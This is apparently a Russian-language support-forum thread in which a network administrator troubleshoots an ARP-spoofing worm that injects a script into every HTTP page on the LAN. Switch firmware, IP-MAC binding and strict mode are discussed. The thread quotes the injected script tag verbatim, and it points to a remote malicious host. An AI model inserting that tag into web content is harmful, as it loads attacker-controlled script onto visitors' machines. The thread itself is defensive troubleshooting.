В сети завелася вирус у кого-то из пользователей, похоже.
У нас стоит Интернет сервер win 2003+биллинг Трафик Инспектор (аторизация без VPN). Сеть на свичах DES-3526. У всех портов прописаны MAC-IP binding.
Все работает нормально, до того момента как в сети начинают появляться некоторые пользователи.
И тут начинается интересная вещь. У всех пользователей во все запршиваемые интернет странички , даже с локального web-сервера начинает встариваться первой строчкой вот такое дело <script language="javascript" SRC="http://mx.content-type.cn:443/day.js">
В логах нескольких свичей нашел записи относящиеся к портам пользователей типа такой "Unauthenticated IP-MAC address and discarded by ip mac port binding (IP: 192.168.0.200, MAC: 00-01-6C-C7-F0-4E, port: 10)", адрес нашего интернет сервера 192.168.0.200.
На лицо попытка подмены IP, перехват http трафика и добавление в него своих ссылок.
Я отключил таких пользователей. Но проблема подстановки сылки не исчесзла. Она исчезает, если только отрубить всю сеть.
И еще я обнаружил, несмотря на то, что прописаны MAC-IP Binding, если задать на машине ip несоответсвующих этой паре, но соответсвующей адресу другой машины в сети, то все равно происходит конфликт IP адресов.
Возникают 2 вопроса:
как же работает этот вирус когда четко прописаны все ip-mac адреса и как защититься от такого вида вирусов.
Как сделать так чтобы небыло конфликтов IP

Вот что нашел на сайте McAfee "FDoS-Tatol will use ARP spoofing on the local LAN. It will sniff for HTTP replies and inject a JS script into the body of the HTML page. The script embeds an IFrame which points to a remote site hosting malicious scripts."

Какая у вас версия прошивки?

Версия 5.01-B09

Пожалуйста обновите прошивку на ту что я Вам выслал и выставите при настройке IMP на порту режим strict.

Что-то не пришло, может на другой адрес попробуете.
lexa-koresh@yandex.ru

Я Вам прошивку выслал.

А когда релиз будет, а то я затарился и мне нужна надёжная прошивка.

И вопрос по поводу обновления прошивки.
Как понять какой имидж спрятан вимидж 2, какая там версия и чо там лежит ?
Это типа нужно для тестовой загрузки ранее загруженной прошивки ?

Релиз будет в июле-августе. Просто с новой прошивкой не используйте второй имидж, заливайте сразу в первый и единственный.

Установили прошивку на все коммутаторы. Установили Striсt на всех юзверьских портах. Разницы никакой. Так же возникает конфликт IP у "правильных машин" при установке несвоего ip на другой машине.
А вирус продолжает свой вредоносный труд.

Оять "подозрительных" юзверей отключили. Стало получше. но все равно у кого-то сидит зараза.

Что можно еще на свичах сделать чтобы избавиться от ARP Spoofinga?
И еще бы сделать, чтоб не отключалась машина с "правильным IP", когда в другой машине вбили несвой ip,

Попробуйте сделать как описано здесь http://www.dlink.ru/technical/faq_hub_switch_115.php

Да, настроить эту чтуку будет реально не просто.

А что сложного если не секрет?

Если бы вы хотели выслушать я бы тут написал мемуар с вопросами.

Мдяяяяяя......
Трудоемкакая задачка.
Этож нужно каждому порту прописывать.
А если у пользователя меняется сетевая карта, то еще раз дописывать.
Не ужто кто так вправду делает????

А в новой ожидаемой прошивке будет инструмент для предотвращения подобного?